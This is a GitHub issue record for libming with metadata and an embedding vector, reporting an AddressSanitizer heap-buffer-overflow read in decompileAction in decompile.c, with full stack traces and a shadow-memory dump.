null
null
null
null
null
null
[ "libming", "libming" ]
==23822==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x6140000007d0 at pc 0x00000052ba7d bp 0x7ffe1407fcd0 sp 0x7ffe1407fcc8 READ of size 1 at 0x6140000007d0 thread T0 #0 0x52ba7c in decompileAction /libming-ming-0_4_8/util/decompile.c:3120:37 #1 0x5471d0 in decompileActions /libming-ming-0_4_8/util/decompile.c:3401:6 #2 0x545509 in decompileSETTARGET /libming-ming-0_4_8/util/decompile.c:3076:3 #3 0x52d350 in decompileAction /libming-ming-0_4_8/util/decompile.c:3372:10 #4 0x5471d0 in decompileActions /libming-ming-0_4_8/util/decompile.c:3401:6 #5 0x5378c8 in decompileIF /libming-ming-0_4_8/util/decompile.c:2270:3 #6 0x52c6be in decompileAction /libming-ming-0_4_8/util/decompile.c:3242:10 #7 0x5471d0 in decompileActions /libming-ming-0_4_8/util/decompile.c:3401:6 #8 0x53c263 in decompileIF /libming-ming-0_4_8/util/decompile.c:2562:4 #9 0x52c6be in decompileAction /libming-ming-0_4_8/util/decompile.c:3242:10 #10 0x5471d0 in decompileActions /libming-ming-0_4_8/util/decompile.c:3401:6 #11 0x53c263 in decompileIF /libming-ming-0_4_8/util/decompile.c:2562:4 #12 0x52c6be in decompileAction /libming-ming-0_4_8/util/decompile.c:3242:10 #13 0x5471d0 in decompileActions /libming-ming-0_4_8/util/decompile.c:3401:6 #14 0x546dd6 in decompile5Action /libming-ming-0_4_8/util/decompile.c:3423:2 #15 0x51f261 in outputSWF_DOACTION /libming-ming-0_4_8/util/outputscript.c:1548:29 #16 0x51c3c9 in outputBlock /libming-ming-0_4_8/util/outputscript.c:2079:4 #17 0x5287fe in readMovie /libming-ming-0_4_8/util/main.c:277:4 #18 0x526ddc in main /libming-ming-0_4_8/util/main.c:350:2 #19 0x7f4fc814e82f in __libc_start_main /build/glibc-LK5gWL/glibc-2.23/csu/../csu/libc-start.c:291 #20 0x419ed8 in _start (/libming-ming-0_4_8/util/swftophp+0x419ed8) 0x6140000007d0 is located 0 bytes to the right of 400-byte region [0x614000000640,0x6140000007d0) allocated by thread T0 here: #0 0x4d2750 in calloc /fuzzer/build/llvm_tools/llvm-4.0.0.src/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:74 #1 0x555ba2 in parseSWF_ACTIONRECORD /libming-ming-0_4_8/util/parser.c:1062:43 #2 0x55615a in parseSWF_ACTIONRECORD /libming-ming-0_4_8/util/parser.c:1075:4 #3 0x55615a in parseSWF_ACTIONRECORD /libming-ming-0_4_8/util/parser.c:1075:4 #4 0x5802c7 in parseSWF_DOACTION /libming-ming-0_4_8/util/parser.c:2434:7 #5 0x5298b5 in blockParse /libming-ming-0_4_8/util/blocktypes.c:145:14 #6 0x5285bb in readMovie /libming-ming-0_4_8/util/main.c:265:11 #7 0x526ddc in main /libming-ming-0_4_8/util/main.c:350:2 #8 0x7f4fc814e82f in __libc_start_main /build/glibc-LK5gWL/glibc-2.23/csu/../csu/libc-start.c:291 SUMMARY: AddressSanitizer: heap-buffer-overflow /libming-ming-0_4_8/util/decompile.c:3120:37 in decompileAction Shadow bytes around the buggy address: 0x0c287fff80a0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd 0x0c287fff80b0: fd fd fd fd fd fd fd fd fd fd fa fa fa fa fa fa 0x0c287fff80c0: fa fa fa fa fa fa fa fa 00 00 00 00 00 00 00 00 0x0c287fff80d0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c287fff80e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 =>0x0c287fff80f0: 00 00 00 00 00 00 00 00 00 00[fa]fa fa fa fa fa 0x0c287fff8100: fa fa fa fa fa fa fa fa 00 00 00 00 00 00 00 00 0x0c287fff8110: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c287fff8120: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c287fff8130: 00 00 00 00 00 00 00 00 00 00 fa fa fa fa fa fa 0x0c287fff8140: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb ==23822==ABORTING
Heap Buffer Overflow in function decompileAction decompile.c 3120
https://api.github.com/repos/libming/libming/issues/226/comments
0
2021-06-21T06:15:58
2021-06-21T06:15:58Z
https://github.com/libming/libming/issues/226
925,865,044
226
false
This is a GitHub Issue repo:libming owner:libming Title : Heap Buffer Overflow in function decompileAction decompile.c 3120 Issue date: --- start body --- ==23822==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x6140000007d0 at pc 0x00000052ba7d bp 0x7ffe1407fcd0 sp 0x7ffe1407fcc8 READ of size 1 at 0x6140000007d0 thread T0 #0 0x52ba7c in decompileAction /libming-ming-0_4_8/util/decompile.c:3120:37 #1 0x5471d0 in decompileActions /libming-ming-0_4_8/util/decompile.c:3401:6 #2 0x545509 in decompileSETTARGET /libming-ming-0_4_8/util/decompile.c:3076:3 #3 0x52d350 in decompileAction /libming-ming-0_4_8/util/decompile.c:3372:10 #4 0x5471d0 in decompileActions /libming-ming-0_4_8/util/decompile.c:3401:6 #5 0x5378c8 in decompileIF /libming-ming-0_4_8/util/decompile.c:2270:3 #6 0x52c6be in decompileAction /libming-ming-0_4_8/util/decompile.c:3242:10 #7 0x5471d0 in decompileActions /libming-ming-0_4_8/util/decompile.c:3401:6 #8 0x53c263 in decompileIF /libming-ming-0_4_8/util/decompile.c:2562:4 #9 0x52c6be in decompileAction /libming-ming-0_4_8/util/decompile.c:3242:10 #10 0x5471d0 in decompileActions /libming-ming-0_4_8/util/decompile.c:3401:6 #11 0x53c263 in decompileIF /libming-ming-0_4_8/util/decompile.c:2562:4 #12 0x52c6be in decompileAction /libming-ming-0_4_8/util/decompile.c:3242:10 #13 0x5471d0 in decompileActions /libming-ming-0_4_8/util/decompile.c:3401:6 #14 0x546dd6 in decompile5Action /libming-ming-0_4_8/util/decompile.c:3423:2 #15 0x51f261 in outputSWF_DOACTION /libming-ming-0_4_8/util/outputscript.c:1548:29 #16 0x51c3c9 in outputBlock /libming-ming-0_4_8/util/outputscript.c:2079:4 #17 0x5287fe in readMovie /libming-ming-0_4_8/util/main.c:277:4 #18 0x526ddc in main /libming-ming-0_4_8/util/main.c:350:2 #19 0x7f4fc814e82f in __libc_start_main /build/glibc-LK5gWL/glibc-2.23/csu/../csu/libc-start.c:291 #20 0x419ed8 in _start (/libming-ming-0_4_8/util/swftophp+0x419ed8) 0x6140000007d0 is located 0 bytes to the right of 400-byte region [0x614000000640,0x6140000007d0) allocated by thread T0 here: #0 0x4d2750 in calloc /fuzzer/build/llvm_tools/llvm-4.0.0.src/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:74 #1 0x555ba2 in parseSWF_ACTIONRECORD /libming-ming-0_4_8/util/parser.c:1062:43 #2 0x55615a in parseSWF_ACTIONRECORD /libming-ming-0_4_8/util/parser.c:1075:4 #3 0x55615a in parseSWF_ACTIONRECORD /libming-ming-0_4_8/util/parser.c:1075:4 #4 0x5802c7 in parseSWF_DOACTION /libming-ming-0_4_8/util/parser.c:2434:7 #5 0x5298b5 in blockParse /libming-ming-0_4_8/util/blocktypes.c:145:14 #6 0x5285bb in readMovie /libming-ming-0_4_8/util/main.c:265:11 #7 0x526ddc in main /libming-ming-0_4_8/util/main.c:350:2 #8 0x7f4fc814e82f in __libc_start_main /build/glibc-LK5gWL/glibc-2.23/csu/../csu/libc-start.c:291 SUMMARY: AddressSanitizer: heap-buffer-overflow /libming-ming-0_4_8/util/decompile.c:3120:37 in decompileAction Shadow bytes around the buggy address: 0x0c287fff80a0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd 0x0c287fff80b0: fd fd fd fd fd fd fd fd fd fd fa fa fa fa fa fa 0x0c287fff80c0: fa fa fa fa fa fa fa fa 00 00 00 00 00 00 00 00 0x0c287fff80d0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c287fff80e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 =>0x0c287fff80f0: 00 00 00 00 00 00 00 00 00 00[fa]fa fa fa fa fa 0x0c287fff8100: fa fa fa fa fa fa fa fa 00 00 00 00 00 00 00 00 0x0c287fff8110: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c287fff8120: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c287fff8130: 00 00 00 00 00 00 00 00 00 00 fa fa fa fa fa fa 0x0c287fff8140: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb ==23822==ABORTING --- end body ---
4,481
[ -0.03188387677073479, 0.009601560421288013, -0.001954525476321578, -0.004334897268563509, 0.05404244735836983, 0.029700051993131638, -0.0354362390935421, 0.04309419170022011, -0.029292402788996696, 0.05081038177013397, -0.03581476956605911, 0.0015341386897489429, 0.004338536877185106, 0.0265116635710001, 0.009303104132413864, 0.00540133286267519, -0.010627959854900837, -0.000970893248450011, -0.025754602625966072, -0.020979300141334534, 0.021066654473543167, -0.00871347077190876, -0.02592930942773819, 0.05742010101675987, -0.028593579307198524, -0.00834949966520071, -0.016669882461428642, 0.00047634734073653817, 0.0027370634488761425, 0.014012891799211502, -0.014602525159716606, 0.02878284454345703, 0.007359498180449009, -0.030136816203594208, 0.05608068406581879, -0.0007893625879660249, 0.048335377126932144, 0.055964212864637375, -0.00019222230184823275, 0.0454818420112133, -0.011625240556895733, -0.06132186949253082, -0.0417838953435421, 0.013517891056835651, -0.0041783894412219524, 0.024400630965828896, 0.003552359063178301, -0.0317382887005806, -0.040852129459381104, 0.028622696176171303, 0.019537974148988724, 0.015228555537760258, -0.018373267725110054, -0.03287388011813164, 0.026453427970409393, -0.0018353249179199338, 0.014071127399802208, 0.011042886413633823, 0.009121119044721127, -0.0021128528751432896, -0.0121639184653759, 0.004021882079541683, 0.0136198028922081, 0.019508857280015945, -0.013634362258017063, -0.005561480298638344, -0.0069991666823625565, 0.014791790395975113, -0.006682511419057846, 0.01902841590344906, -0.030195051804184914, -0.043006837368011475, -0.017499735578894615, 0.028273284435272217, 0.00120747450273484, -0.02291562780737877, 0.0256526917219162, -0.002751622349023819, -0.04987861588597298, 0.045278020203113556, -0.04259919002652168, 0.013459655456244946, -0.02275548130273819, 0.037940360605716705, 0.023701805621385574, 0.022100333124399185, -0.04714155197143555, -0.0679607093334198, -0.05273215100169182, -0.05066479369997978, -0.03456270694732666, 0.010365900583565235, 0.039949480444192886, 0.017237676307559013, -0.009106559678912163, 0.004931809846311808, -0.016728118062019348, -0.018824592232704163, -0.06079775094985962, -0.005299421027302742, -0.0250557791441679, 0.014566128142178059, -0.01802385412156582, -0.008371338248252869, 0.020076652988791466, 0.03453359007835388, -0.02392018772661686, -0.02435695379972458, 0.01685914769768715, 0.10307665169239044, 0.006638835184276104, -0.021081212908029556, 0.013568847440183163, 0.009907296858727932, 0.00543409027159214, 0.016626205295324326, 0.007210270036011934, -0.009477810934185982, -0.03933800756931305, -0.0021747280843555927, 0.01742694154381752, -0.013685317710042, -0.014791790395975113, 0.0028244166169315577, -0.025390632450580597, 0.028142254799604416, 0.0017297732410952449, -0.058817747980356216, -0.010780827142298222, -0.03380564600229263, -0.010431415401399136, -0.03267005831003189, 0.024415189400315285, 0.00048226185026578605, -0.02722504734992981, -0.021343272179365158, 0.001085544121451676, 0.023570775985717773, 0.02824416570365429, -0.007202990353107452, -0.04562743008136749, -0.006802622228860855, -0.005808980669826269, -0.016888264566659927, -0.008036484010517597, 0.025274161249399185, -0.012185756117105484, 0.032786525785923004, -0.018184002488851547, 0.016597088426351547, 0.019217681139707565, -0.006522363983094692, 0.025434307754039764, 0.008800824172794819, -0.006718908436596394, -0.01985826902091503, 0.028258726000785828, 0.045714784413576126, 0.0017807291587814689, -0.03296123445034027, -0.014347745105624199, -0.010911856777966022, 0.016815470531582832, -0.020644446834921837, -0.016393262892961502, -0.006293062120676041, 0.019057532772421837, -0.007141115143895149, -0.012797228060662746, 0.034766532480716705, 0.029729168862104416, 0.03470829501748085, -0.0020073011983186007, 0.020833712071180344, -0.04216242581605911, -0.011188475415110588, -0.008254867047071457, -0.004167470615357161, -0.057245392352342606, -0.026162251830101013, 0.010365900583565235, 0.029714610427618027, 0.010118399746716022, -0.0035214214585721493, 0.007374057080596685, -0.009405015967786312, -0.015592526644468307, -0.05180038511753082, 0.002691567176952958, -0.02907402068376541, -0.015796350315213203, -0.005943649914115667, -0.0042693824507296085, -0.0031629097647964954, 0.04653007909655571, 0.0009790825424715877, -0.05086861550807953, -0.02792387269437313, 0.0012638900661841035, 0.006427731830626726, -0.0162622332572937, -0.008152955211699009, -0.04824802279472351, 0.0354362390935421, -0.062428344041109085, 0.004848096519708633, -0.028986668214201927, 0.003854455193504691, 0.01700473576784134, -0.0031192332971841097, 0.016305910423398018, -0.01685914769768715, -0.0003967286320403218, -0.005375854671001434, -0.018387826159596443, 0.014100245200097561, -0.008800824172794819, 0.008429573848843575, 0.005714348051697016, -0.0026278721634298563, 0.036484476178884506, -0.0014486054424196482, -0.02205665595829487, -0.008626118302345276, -0.05442097783088684, -0.006322179920971394, -0.019960181787610054, -0.00781082222238183, -0.03188387677073479, -0.005182950291782618, 0.008211190812289715, -0.004749824292957783, 0.0013867303496226668, 0.026730045676231384, 0.01611664518713951, -0.018533414229750633, -0.0005154742393642664, 0.013678038492798805, -0.02547798492014408, 0.019377827644348145, 0.0008061962435021996, 0.027530783787369728, -0.009310383349657059, -0.030311523005366325, 0.020338712260127068, 0.05145097151398659, -0.017805472016334534, -0.0011301306076347828, -0.03036975860595703, 0.005015523172914982, 0.002611493458971381, -0.02001841738820076, 0.017339589074254036, -0.019275914877653122, 0.028579020872712135, -0.0070501226000487804, 0.05281950160861015, 0.034067705273628235, -0.028957549482584, -0.009303104132413864, 0.026846516877412796, 0.02421136572957039, -0.007483248133212328, 0.010380459018051624, -0.004385853186249733, -0.0036979475989937782, -0.01080266572535038, 0.0011647079372778535, -0.00863339751958847, -0.02189650759100914, 0.04979126155376434, -0.03159270063042641, -0.023425187915563583, -0.02793843112885952, -0.00042721122736111283, -0.0018207660177722573, 0.00820391159504652, 0.0044222502037882805, -0.008036484010517597, -0.03654270991683006, -0.029845640063285828, 0.02290106937289238, 0.007268505170941353, 0.033339764922857285, -0.004826258402317762, -0.009594281204044819, 0.03395123407244682, 0.011537887156009674, -0.01728135347366333, -0.019945623353123665, -0.0011783568188548088, -0.031330641359090805, -0.05229538306593895, -0.0021292315796017647, -0.0014531550696119666, 0.029350638389587402, -0.011705314740538597, 0.00608195923268795, -0.010213032364845276, -0.010263988748192787, 0.00017288632807321846, -0.007672513369470835, 0.0038326168432831764, -0.02866637334227562, -0.0386100672185421, 0.005339457653462887, -0.007253946270793676, 0.018460620194673538, -0.01346693467348814, -0.0026187729090452194, 0.041114188730716705, -0.017820030450820923, -0.010227590799331665, 0.010147517547011375, -0.036804769188165665, -0.02361445315182209, 0.01728135347366333, -0.03878477215766907, -0.018533414229750633, 0.022231362760066986, -0.032495349645614624, 0.0063003418035805225, -0.03712506592273712, 0.0021219521295279264, 0.017630765214562416, 0.012382300570607185, -0.03791124373674393, 0.02806946076452732, -0.041842132806777954, 0.0014049288583919406, -0.023366952314972878, 0.0013739913702011108, -0.02967093326151371, -0.03738712519407272, -0.02145974338054657, -0.04303595796227455, -0.013430537655949593, 0.03919241949915886, 0.015767233446240425, 0.0034595464821904898, -0.04851008206605911, 0.037940360605716705, -0.012214873917400837, 0.027690930292010307, -0.031621817499399185, -0.006063760258257389, 0.008808103390038013, -0.021649008616805077, 0.02996211126446724, 0.00914295669645071, 0.0009627038962207735, -0.00013341820158530027, 0.05905069038271904, 0.02608945593237877, 0.0021037536207586527, -0.021794596686959267, -0.026904752478003502, -0.00013330446381587535, -0.003626973135396838, -0.002768001053482294, -0.029161373153328896, -0.013627082109451294, 0.0023658128920942545, 0.007104718126356602, 0.00914295669645071, 0.0017379625933244824, 0.0356982983648777, -0.013597964309155941, -0.009004647843539715, 0.003941808361560106, -0.019829152151942253, 0.045423608273267746, -0.007526924833655357, 0.03986212611198425, 0.0016078428598120809, -0.012717153877019882, -0.00325572257861495, 0.008444132283329964, -0.016451498493552208, 0.023832835257053375, -0.016495175659656525, 0.024720925837755203, 0.021095771342515945, -0.04338536784052849, -0.007155674044042826, -0.01914488524198532, -0.023847393691539764, 0.017179440706968307, -0.01585458591580391, -0.017383266240358353, -0.017456060275435448, 0.033747412264347076, -0.01367075927555561, -0.051625676453113556, -0.023410629481077194, 0.017645325511693954, 0.010547885671257973, -0.01072259247303009, 0.05346009135246277, -0.06580599397420883, -0.005383134353905916, -0.011850902810692787, 0.057827748358249664, 0.02607489749789238, -0.017674442380666733, 0.03293211758136749, 0.005692509934306145, -0.03159270063042641, 0.022580774500966072, 0.019406944513320923, 0.04175477847456932, -0.029583580791950226, -0.035348884761333466, 0.00198000343516469, 0.05715804174542427, 0.02678828127682209, 0.005423170980066061, -0.014835466630756855, -0.0280985776335001, 0.011370460502803326, -0.013437816873192787, 0.026467986404895782, 0.011312225833535194, 0.02464812994003296, 0.019101209938526154, 0.02176547795534134, 0.007505086716264486, 0.006285782903432846, 0.03185475990176201, -0.011574285104870796, -0.026016661897301674, 0.018970180302858353, 0.022726362571120262, -0.012425977736711502, -0.01611664518713951, -0.033776529133319855, -0.008851779624819756, -0.0530233271420002, -0.03616417944431305, -0.018911944702267647, 0.021940184757113457, 0.008036484010517597, -0.03243711590766907, -0.042249780148267746, -0.00010589287558104843, -0.046005960553884506, -0.007992807775735855, -0.012920978479087353, 0.021794596686959267, 0.0021419706754386425, -0.02172180265188217, 0.029874756932258606, 0.015796350315213203, -0.0027443428989499807, 0.031767409294843674, -0.013932818546891212, -0.029408873990178108, 0.0033922118600457907, 0.015636203810572624, -0.020935624837875366, -0.012382300570607185, 0.017747236415743828, -0.010999210178852081, -0.018344148993492126, 0.03400947153568268, 0.04379301518201828, 0.013284949585795403, -0.009994649328291416, -0.006744386628270149, -0.021561654284596443, 0.00460787583142519, 0.02291562780737877, -0.004691589158028364, -0.02766181342303753, -0.004622434265911579, 0.038115065544843674, 0.0011974653461948037, -0.01959620974957943, -0.0003648811543826014, -0.023265039548277855, -0.006886335555464029, -0.02089194767177105, -0.013925538398325443, -0.00039035914232954383, 0.04248271882534027, 0.00781082222238183, -0.0029736447613686323, -0.010023767128586769, 0.002957266056910157, 0.011588843539357185, 0.01712120696902275, -0.0063804155215620995, -0.018984738737344742, -0.022580774500966072, 0.009084722027182579, -0.02246430329978466, -0.03791124373674393, 0.007108357734978199, 0.03776565194129944, -0.013394140638411045, -0.008407735265791416, -0.011559725739061832, 0.044288016855716705, 0.0047170668840408325, -0.0014840926742181182, -0.02824416570365429, -0.04123065993189812, 0.017485177144408226, -0.010147517547011375, -0.02046974189579487, -0.007384975906461477, -0.02361445315182209, 0.012950096279382706, -0.042278897017240524, -0.006900894455611706, -0.020659007132053375, 0.018067531287670135, 0.018373267725110054, 0.029787404462695122, 0.011079283431172371, 0.007035563699901104, -0.017033852636814117, -0.004000043496489525, 0.03744535893201828, 0.024662690237164497, -0.003186567919328809, 0.04131801426410675, -0.003559638513252139, -0.0067771440371870995, -0.03540711849927902, -0.007213909644633532, -0.0034850244410336018, -0.03590212017297745, 0.0320003479719162, -0.0027370634488761425, -0.009907296858727932, -0.01929047517478466, -0.013954656198620796, -0.008706191554665565, 0.013132081367075443, -0.004775302484631538, 0.04088124632835388, -0.042540956288576126, 0.007046482991427183, -0.05331450328230858, 0.006587878800928593, 0.018329590559005737, -0.006544202566146851, 0.013081125915050507, 0.015082967467606068, 0.012047447264194489, 0.0016933761071413755, 0.013918259181082249, 0.003963646478950977, -0.006635195109993219, 0.030195051804184914, -0.01138501986861229, -0.00232031662017107, 0.01728135347366333, 0.011654358357191086, 0.00965979602187872, -0.02000385895371437, 0.0056306347250938416, -0.01611664518713951, -0.005958208814263344, 0.006311261095106602, -0.008698912337422371, 0.03444623574614525, -0.029991228133440018, -0.0020000217482447624, 0.01597105711698532, -0.0031192332971841097, 0.04821890592575073, -0.008538764901459217, -0.010620679706335068, 0.017761794850230217, -0.032466232776641846, 0.003101034788414836, -0.00021701783407479525, -0.024531660601496696, 0.017062971368432045, -0.020426064729690552, 0.034213293343782425, 0.015213997103273869, 0.03336888179183006, -0.024284159764647484, -0.011188475415110588, 0.028316961601376534, -0.011865461245179176, 0.00015377784438896924, 0.007912734523415565, -0.010526048019528389, 0.0009181174100376666, 0.014922820031642914, -0.007643395569175482, 0.005146552808582783, 0.004338536877185106, -0.018504297360777855, 0.022493422031402588, 0.013976494781672955, -0.00443316949531436, 0.03619329631328583, 0.022668126970529556, -0.04979126155376434, -0.030078580603003502, 0.01758708991110325, 0.027909312397241592, 0.01353244949132204, -0.01959620974957943, 0.02173636108636856, 0.03945447877049446, 0.01549061480909586, 0.007141115143895149, 0.011334063485264778, -0.006711629219353199, -0.021925626322627068, -0.006191150285303593, 0.019101209938526154, -0.017179440706968307, 0.010052884928882122, -0.004702507983893156, -0.04725802317261696, 0.012629801407456398, -0.0014859124785289168, -0.013197596184909344, -0.005241185426712036, -0.03718329966068268, -0.017645325511693954, -0.004942729137837887, -0.015650762245059013, -0.013787229545414448, 0.0292196087539196, 0.013779950328171253, -0.026569899171590805, -0.01701929420232773, 0.026467986404895782, 0.017951060086488724, -0.002309397328644991, -0.013867303729057312, 0.004192948341369629, -0.006049201823771, 0.029350638389587402, -0.005048280581831932, -0.008342220447957516, -0.022857392206788063, 0.007548762951046228, -0.014085685834288597, 0.010890019126236439, 0.00024636302259750664, 0.013110242784023285, -0.04021153971552849, -0.025419749319553375, 0.01172715239226818, -0.002030959352850914, 0.01959620974957943, -0.03179652616381645, 0.034941237419843674, 0.0495874397456646, -0.011406857520341873, 0.0008853600011207163, -0.028273284435272217, -0.046588316559791565, -0.015883704647421837, 0.02319224551320076, 0.021139448508620262, -0.006649754010140896, -0.022726362571120262, -0.004338536877185106, 0.02434239536523819, 0.014879143796861172, -0.0012611602433025837, 0.007341299671679735, 0.026395192369818687, 0.007541483733803034, -0.02504121884703636, -0.019101209938526154, 0.042104192078113556, 0.013809068128466606, -0.010358620434999466, -0.008101998828351498, -0.006616996601223946, -0.01446421630680561, 0.006540562957525253, 0.011683476157486439, -0.022784598171710968, -0.0026442508678883314, -0.010205753147602081, -0.008291264064610004, -0.02246430329978466, -0.009849061258137226, 0.06277775764465332, 0.003828977234661579, 0.03418417647480965, 0.018533414229750633, 0.016917381435632706, -0.031767409294843674, 0.015141203068196774, -0.021809155121445656, -0.036950357258319855, 0.005346737336367369, -0.009121119044721127, 0.0006383145228028297, -0.016888264566659927, 0.011028327979147434, -0.0048371776938438416, 0.022959304973483086, -0.015272232703864574, -0.014274951070547104, 0.039105068892240524, -0.01446421630680561, 0.0014522451674565673, -0.00806560181081295, -0.01828591339290142, 0.015636203810572624, 0.031767409294843674, -0.020062092691659927, -0.005354016553610563, -0.003719785949215293, -0.004109235014766455, -0.024720925837755203, -0.03962918743491173, -0.05226626619696617, -0.026700928807258606, -0.042278897017240524, 0.0023112171329557896, 0.002300298074260354, 0.002809857716783881, -0.005215707700699568, 0.010839062742888927, 0.011217593215405941, -0.017237676307559013, -0.029598139226436615, -0.00965979602187872, 0.01346693467348814, -0.054508328437805176, 0.015461497008800507, 0.022551655769348145, -0.008626118302345276, 0.0033467153552919626, 0.013663479126989841, 0.002363993087783456, 0.0065733203664422035, 0.02118312567472458, -0.031039465218782425, -0.006980968173593283, -0.006722548510879278, 0.0007452310528606176, 0.021343272179365158, -0.0024367873556911945, 0.041550952941179276, 0.018096648156642914, 0.006263944786041975, 0.024255041033029556, -0.05375126749277115, -0.015228555537760258, 0.014580686576664448, 0.024837395176291466, 0.0067261881195008755, 0.01841694302856922, 0.004374933894723654, -0.016786351799964905, 0.010890019126236439, 0.015228555537760258, 0.02333783358335495, 0.013095684349536896, 0.027123134583234787, 0.027618136256933212, 0.009084722027182579, 0.01757252961397171, -0.005656112916767597, 0.01784914918243885, -0.005605156533420086, -0.07029011845588684, -0.008014646358788013, 0.00813111662864685, -0.04274477809667587, -0.015097525902092457, 0.03054446540772915, 0.004760743584483862, 0.020819153636693954, -0.03299035131931305, 0.024677248671650887, -0.012258550152182579, 0.01232406497001648, -0.023701805621385574, -0.01669899933040142, 0.01108656357973814, -0.010678915306925774, 0.01713576540350914, 0.018649885430932045, 0.00972531083971262, -0.031476229429244995, 0.02129959501326084, -0.01931959204375744, 0.00543409027159214, -0.04434625431895256, -0.008706191554665565, 0.008036484010517597, 0.005645193625241518, -0.03214593604207039, 0.0265116635710001, 0.0280985776335001, -0.05180038511753082, -0.03601859137415886, 0.008211190812289715, -0.018315032124519348, -0.013590685091912746, 0.03310682252049446, -0.023279599845409393, 0.024881072342395782, 0.008385896682739258, -0.01584002748131752, 0.009805385023355484, 0.01671355776488781, 0.01815488375723362, 0.02176547795534134, -0.006052841432392597, -0.010999210178852081, 0.00647868774831295, -0.0024240482598543167, 0.01116663683205843, 0.016378704458475113, 0.0021856471430510283, -0.03432976454496384, 0.01741238310933113, 0.0024240482598543167, 0.024982985109090805, 0.011668916791677475, -0.008480529300868511, 0.015898263081908226, -0.008757147938013077, -0.015184879302978516, -0.013284949585795403, 0.013408700004220009, -0.001493191928602755, 0.02100841887295246, -0.01875179633498192, 0.008436853066086769, -0.017921943217515945, 0.028753725811839104, -0.004902692511677742, 0.00154050812125206, -0.02260989136993885, 0.0023858314380049706, -0.0073158214800059795, -0.005707068834453821, -0.011093842796981335, 0.01159612275660038, 0.014951937831938267, -0.025783721357584, 0.017965618520975113, 0.04332713410258293, -0.003328516846522689, 0.02332327514886856, -0.0005259384051896632, 0.000033382984838681296, 0.007505086716264486, -0.013350464403629303, 0.026322398334741592, -0.009106559678912163, 0.03168005496263504, 0.012658919207751751, -0.02346886321902275, -0.010111120529472828, 0.03240799531340599, 0.03051534667611122, -0.019843710586428642, -0.03598947450518608, 0.017645325511693954, -0.008691633120179176, -0.005619715433567762, -0.013212155550718307, 0.03293211758136749, 0.00033849323517642915, -0.009448693133890629, -0.02824416570365429, -0.012476933188736439, -0.02260989136993885, 0.006253025494515896, 0.022085772827267647, -0.0031629097647964954, 0.0009335861541330814, 0.016757234930992126, 0.006456849165260792, -0.0065733203664422035, -0.02262445166707039, -0.004906332120299339, -0.028593579307198524, -0.007963689975440502, 0.021809155121445656, 0.0003207496483810246, 0.010082002729177475, -0.028025783598423004, -0.03531976789236069, 0.02951078675687313, 0.01929047517478466, -0.012273109517991543, -0.03904683142900467, -0.013568847440183163, -0.004196587949991226, -0.005277582444250584, 0.010664356872439384, -0.022406067699193954, 0.019203120842576027, -0.025871073827147484, 0.015665320679545403, 0.03328152745962143, -0.00583081878721714, 0.014951937831938267, 0.015563408844172955, 0.03529065102338791, 0.010132959112524986, -0.002655169926583767, -0.03051534667611122, -0.021255919709801674, -0.014733554795384407, -0.044724784791469574, 0.036513593047857285, 0.004294860176742077, 0.044142428785562515, -0.01643694005906582, 0.023861952126026154, -0.013568847440183163, 0.007119277026504278, 0.010023767128586769, -0.017179440706968307, -0.030893877148628235, 0.008342220447957516, -0.002092834562063217, 0.0018890106584876776, 0.00755604263395071, -0.01065707765519619, -0.004771662876009941, 0.0007748037460260093, -0.004738905467092991, 0.011283108033239841, -0.0532853864133358, 0.0339803546667099, -0.039250656962394714, -0.021532537415623665, 0.008691633120179176, 0.003543259808793664, 0.03357270359992981, 0.0007279424462467432, -0.008473250083625317, 0.025579897686839104, 0.02735607698559761, -0.010169356130063534, -0.007788984104990959, -0.030486229807138443, -0.04091036319732666, -0.03802771121263504, -0.01901385560631752, -0.010336782783269882, -0.02044062316417694, 0.007166593335568905, -0.026264162734150887, -0.0035741974133998156, -0.004848096519708633, 0.02491018921136856, 0.017223117873072624, 0.03529065102338791, -0.012287667952477932, -0.005452288780361414, 0.009688913822174072, 0.027152253314852715, -0.01390370074659586, 0.005976407323032618, -0.03671741485595703, -0.004931809846311808, 0.014143921434879303, -0.007075600326061249, -0.011283108033239841, 0.02186739072203636, -0.020644446834921837, 0.018096648156642914, 0.0023585334420204163, -0.018387826159596443, 0.010329503566026688, 0.006071039941161871, -0.009688913822174072, 0.0004904512315988541, 0.03400947153568268, 0.018227677792310715, -0.0008057412924245, -0.027982106432318687, -0.0062785036861896515, 0.01802385412156582, 0.004484125413000584, -0.0065733203664422035, 0.0028244166169315577, -0.0029135895892977715, 0.030165934935212135, -0.052499208599328995, -0.0007784434128552675, -0.00687541626393795, -0.018955621868371964, -0.0282296072691679, -0.022376950830221176, -0.015053849667310715, -0.02390562929213047, -0.011370460502803326, -0.0013303147861734033, 0.020498858764767647, -0.01582546904683113, 0.009405015967786312, 0.007599718868732452, 0.025157690048217773, -0.028011225163936615, -0.0036378924269229174, -0.024982985109090805, 0.02576916292309761, -0.00130665663164109, 